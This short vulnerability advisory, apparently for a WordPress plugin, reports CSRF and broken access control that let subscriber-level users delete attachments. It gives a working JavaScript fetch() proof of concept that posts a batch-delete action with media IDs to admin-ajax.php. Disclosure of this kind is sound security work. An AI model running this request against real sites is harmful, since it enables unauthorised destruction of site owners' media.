The plugin has CSRF and broken access control vulnerabilities which leads user with role as low as subscriber to delete attachment.
Exploit (#1 attachment id delete): fetch(‘/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=exopite-sof-file-batch-delete&media-ids;%5B%5D=682&media-ids;%5B%5D=683’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));